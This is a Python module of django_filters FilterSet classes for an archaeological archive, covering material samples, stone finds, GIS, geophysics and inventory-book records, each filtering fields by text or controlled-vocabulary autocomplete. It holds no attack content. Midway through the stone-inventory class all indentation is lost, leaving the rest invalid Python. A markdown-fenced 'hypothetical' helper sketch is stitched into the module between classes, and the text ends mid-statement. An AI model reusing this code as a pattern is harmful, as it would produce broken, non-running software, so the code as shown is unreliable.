class FundinventarMaterialprobenListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('legacy_id').help_text,
        label=FundinventarMaterialproben._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('fc_name').help_text,
        label=FundinventarMaterialproben._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('fc_directory').help_text,
        label=FundinventarMaterialproben._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('fc_type').help_text,
        label=FundinventarMaterialproben._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('fc_filename').help_text,
        label=FundinventarMaterialproben._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('fc_extension').help_text,
        label=FundinventarMaterialproben._meta.get_field('fc_extension').verbose_name
    )
    material_sample_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('material_sample_inventory_number').help_text,
        label=FundinventarMaterialproben._meta.get_field('material_sample_inventory_number').verbose_name
    )
    find_local_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('find_local_number').help_text,
        label=FundinventarMaterialproben._meta.get_field('find_local_number').verbose_name
    )
    convolute_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('convolute_inventory_number').help_text,
        label=FundinventarMaterialproben._meta.get_field('convolute_inventory_number').verbose_name
    )
    corresponding_to_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('corresponding_to_inventory_number').help_text,
        label=FundinventarMaterialproben._meta.get_field('corresponding_to_inventory_number').verbose_name
    )
    find_material = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_material"
        ),
        help_text=FundinventarMaterialproben._meta.get_field('find_material').help_text,
        label=FundinventarMaterialproben._meta.get_field('find_material').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_material",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    find_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('find_comment').help_text,
        label=FundinventarMaterialproben._meta.get_field('find_comment').verbose_name
    )
    find_type = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_type"
        ),
        help_text=FundinventarMaterialproben._meta.get_field('find_type').help_text,
        label=FundinventarMaterialproben._meta.get_field('find_type').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_type",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_id_relative"
        ),
        help_text=FundinventarMaterialproben._meta.get_field('stratum_id_relative').help_text,
        label=FundinventarMaterialproben._meta.get_field('stratum_id_relative').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="stratum_id_absolute_prepub"
        ),
        help_text=FundinventarMaterialproben._meta.get_field('stratum_id_absolute_prepub').help_text,
        label=FundinventarMaterialproben._meta.get_field('stratum_id_absolute_prepub').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    stratum_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('stratum_comment').help_text,
        label=FundinventarMaterialproben._meta.get_field('stratum_comment').verbose_name
    )
    phase_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="phase_id"
        ),
        help_text=FundinventarMaterialproben._meta.get_field('phase_id').help_text,
        label=FundinventarMaterialproben._meta.get_field('phase_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/phase_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    storage_find = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="storage_find"
        ),
        help_text=FundinventarMaterialproben._meta.get_field('storage_find').help_text,
        label=FundinventarMaterialproben._meta.get_field('storage_find').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/storage_find",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=FundinventarMaterialproben._meta.get_field('access').help_text,
        label=FundinventarMaterialproben._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="uncertainty_excavation_digitisation"
        ),
        help_text=FundinventarMaterialproben._meta.get_field('uncertainty_excavation_digitisation').help_text,
        label=FundinventarMaterialproben._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarMaterialproben._meta.get_field('digitisation_comment').help_text,
        label=FundinventarMaterialproben._meta.get_field('digitisation_comment').verbose_name
    )

    class Meta:
        model = FundinventarMaterialproben
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'creator_metadata',
            'archaeological_object_id',
            'relatedto',
            'material_sample_inventory_number',
            'find_local_number',
            'convolute_inventory_number',
            'corresponding_to_inventory_number',
            'find_material',
            'find_comment',
            'excavation_object_id',
            'find_type',
            'stratum_id_relative',
            'stratum_id_absolute_prepub',
            'stratum_comment',
            'phase_id',
            'find_year',
            'storage_find',
            'access',
            'uncertainty_excavation_digitisation',
            'digitisation_comment',
        ]

class FundinventarSteininventarListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarSteininventar._meta.get_field('legacy_id').help_text,
        label=FundinventarSteininventar._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarSteininventar._meta.get_field('fc_name').help_text,
        label=FundinventarSteininventar._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarSteininventar._meta.get_field('fc_directory').help_text,
        label=FundinventarSteininventar._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarSteininventar._meta.get_field('fc_type').help_text,
        label=FundinventarSteininventar._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarSteininventar._meta.get_field('fc_filename').help_text,
        label=FundinventarSteininventar._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=FundinventarSteininventar._meta.get_field('fc_extension').help_text,
        label=FundinventarSteininventar._meta.get_field('fc_extension').verbose_name
    )
    find_material = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_material"
        ),
        help_text=FundinventarSteininventar._meta.get_field('find_material').help_text,
        label=FundinventarSteininventar._meta.get_field('find_material').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_material",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    find_type = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_type"
        ),
        help_text=FundinventarSteininventar._meta.get_field('find_type').help_text,
        label=FundinventarSteininventar._meta.get_field('find_type').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_type",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
},
)
)
find_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('find_inventory_number').help_text,
label=FundinventarSteininventar._meta.get_field('find_inventory_number').verbose_name
)
find_local_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('find_local_number').help_text,
label=FundinventarSteininventar._meta.get_field('find_local_number').verbose_name
)
convolute_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('convolute_inventory_number').help_text,
label=FundinventarSteininventar._meta.get_field('convolute_inventory_number').verbose_name
)
corresponding_to_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('corresponding_to_inventory_number').help_text,
label=FundinventarSteininventar._meta.get_field('corresponding_to_inventory_number').verbose_name
)
stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_relative"
),
help_text=FundinventarSteininventar._meta.get_field('stratum_id_relative').help_text,
label=FundinventarSteininventar._meta.get_field('stratum_id_relative').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_absolute_prepub"
),
help_text=FundinventarSteininventar._meta.get_field('stratum_id_absolute_prepub').help_text,
label=FundinventarSteininventar._meta.get_field('stratum_id_absolute_prepub').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
find_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('find_comment').help_text,
label=FundinventarSteininventar._meta.get_field('find_comment').verbose_name
)
phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_id"
),
help_text=FundinventarSteininventar._meta.get_field('phase_id').help_text,
label=FundinventarSteininventar._meta.get_field('phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=FundinventarSteininventar._meta.get_field('access').help_text,
label=FundinventarSteininventar._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
storage_find = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="storage_find"
),
help_text=FundinventarSteininventar._meta.get_field('storage_find').help_text,
label=FundinventarSteininventar._meta.get_field('storage_find').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/storage_find",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('stratum_comment').help_text,
label=FundinventarSteininventar._meta.get_field('stratum_comment').verbose_name
)
uncertainty_excavation_digitisation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="uncertainty_excavation_digitisation"
),
help_text=FundinventarSteininventar._meta.get_field('uncertainty_excavation_digitisation').help_text,
label=FundinventarSteininventar._meta.get_field('uncertainty_excavation_digitisation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/uncertainty_excavation_digitisation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
relatedto = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="relatedto"
),
help_text=FundinventarSteininventar._meta.get_field('relatedto').help_text,
label=FundinventarSteininventar._meta.get_field('relatedto').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/relatedto",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=FundinventarSteininventar._meta.get_field('digitisation_comment').help_text,
label=FundinventarSteininventar._meta.get_field('digitisation_comment').verbose_name
)
class Meta:
model = FundinventarSteininventar
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'archaeological_object_id',
'find_material',
'find_type',
'find_inventory_number',
'find_local_number',
'convolute_inventory_number',
'corresponding_to_inventory_number',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'find_comment',
'excavation_object_id',
'phase_id',
'access',
'storage_find',
'stratum_comment',
'uncertainty_excavation_digitisation',
'find_date',
'relatedto',
'digitisation_comment',
]
class GISListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('legacy_id').help_text,
label=GIS._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_name').help_text,
label=GIS._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_directory').help_text,
label=GIS._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_type').help_text,
label=GIS._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_filename').help_text,
label=GIS._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_extension').help_text,
label=GIS._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('filename').help_text,
label=GIS._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('document_id').help_text,
label=GIS._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('document_title').help_text,
label=GIS._meta.get_field('document_title').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('path_filename_old').help_text,
label=GIS._meta.get_field('path_filename_old').verbose_name
)
path_filename_arche = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('path_filename_arche').help_text,
label=GIS._meta.get_field('path_filename_arche').verbose_name
)
software_used = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('software_used').help_text,
label=GIS._meta.get_field('software_used').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('original_comment').help_text,
label=GIS._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('digitisation_comment').help_text,
label=GIS._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=GIS._meta.get_field('file_extension_original').help_text,
label=GIS._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=GIS._meta.get_field('file_extension_archivalobject').help_text,
label=GIS._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=GIS._meta.get_field('copyright').help_text,
label=GIS._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=GIS._meta.get_field('access').help_text,
label=GIS._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=GIS._meta.get_field('site_id').help_text,
label=GIS._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=GIS._meta.get_field('excavation_post_excavation').help_text,
label=GIS._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = GIS
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'document_type',
'filename',
'document_id',
'document_title',
'path_filename_old',
'path_filename_arche',
'creation_date_original',
'software_used',
'creation_date_archivalobject',
'creation_date_metadata',
'excavation_object_id',
'archaeological_object_id',
'relatedto',
'original_comment',
'digitisation_comment',
'file_extension_original',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
'excavation_post_excavation',
]
class GeophysicsListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('legacy_id').help_text,
label=Geophysics._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_name').help_text,
label=Geophysics._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_directory').help_text,
label=Geophysics._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_type').help_text,
label=Geophysics._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_filename').help_text,
label=Geophysics._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_extension').help_text,
label=Geophysics._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('filename').help_text,
label=Geophysics._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('document_id').help_text,
label=Geophysics._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('document_title').help_text,
label=Geophysics._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('filename_old').help_text,
label=Geophysics._meta.get_field('filename_old').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('path_filename_old').help_text,
label=Geophysics._meta.get_field('path_filename_old').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('original_comment').help_text,
label=Geophysics._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('digitisation_comment').help_text,
label=Geophysics._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=Geophysics._meta.get_field('file_extension_original').help_text,
label=Geophysics._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=Geophysics._meta.get_field('file_extension_archivalobject').help_text,
label=Geophysics._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
method = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="method"
),
help_text=Geophysics._meta.get_field('method').help_text,
label=Geophysics._meta.get_field('method').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/method",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment"
),
help_text=Geophysics._meta.get_field('equipment').help_text,
label=Geophysics._meta.get_field('equipment').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Geophysics._meta.get_field('copyright').help_text,
label=Geophysics._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Geophysics._meta.get_field('access').help_text,
label=Geophysics._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Geophysics._meta.get_field('site_id').help_text,
label=Geophysics._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Geophysics._meta.get_field('excavation_post_excavation').help_text,
label=Geophysics._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Geophysics
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'document_type',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_date_archivalobject',
'creation_date_metadata',
'path_filename_old',
'excavation_object_id',
'original_comment',
'digitisation_comment',
'file_extension_original',
'file_extension_archivalobject',
'method',
'equipment',
'copyright',
'access',
'site_id',
'excavation_post_excavation',
]
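# Each ModelMultipleChoiceFilter above repeats the same Select2Multiple
# configuration, varying only the collection/field name in the URL. If the
# generator were ever refactored by hand, that widget setup could be built by a
# small helper. A hypothetical sketch (the helper name and its existence are
# assumptions, not part of this codebase):

```python
def select2_kwargs(field_name, base="/vocabs-ac/specific-concept-ac"):
    """Build the shared Select2Multiple keyword arguments for one concept field."""
    return {
        "url": f"{base}/{field_name}",
        "attrs": {
            "data-placeholder": "Autocomplete ...",
            "data-minimum-input-length": 2,
        },
    }
```

# Usage would then be e.g.
# `widget=autocomplete.Select2Multiple(**select2_kwargs("access"))`,
# keeping the per-field URL and the shared attrs in one place.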
class InventorybooksListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('legacy_id').help_text,
label=Inventorybooks._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_name').help_text,
label=Inventorybooks._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_directory').help_text,
label=Inventorybooks._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_type').help_text,
label=Inventorybooks._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_filename').help_text,
label=Inventorybooks._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_extension').help_text,
label=Inventorybooks._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('filename').help_text,
label=Inventorybooks._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('document_id').help_text,
label=Inventorybooks._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('document_title').help_text,
label=Inventorybooks._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('filename_old').help_text,
label=Inventorybooks._meta.get_field('filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('creation_year_original').help_text,
label=Inventorybooks._meta.get_field('creation_year_original').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('storage_folder_original').help_text,
label=Inventorybooks._meta.get_field('storage_folder_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('original_comment').help_text,
label=Inventorybooks._meta.get_field('original_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Inventorybooks._meta.get_field('file_extension').help_text,
label=Inventorybooks._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
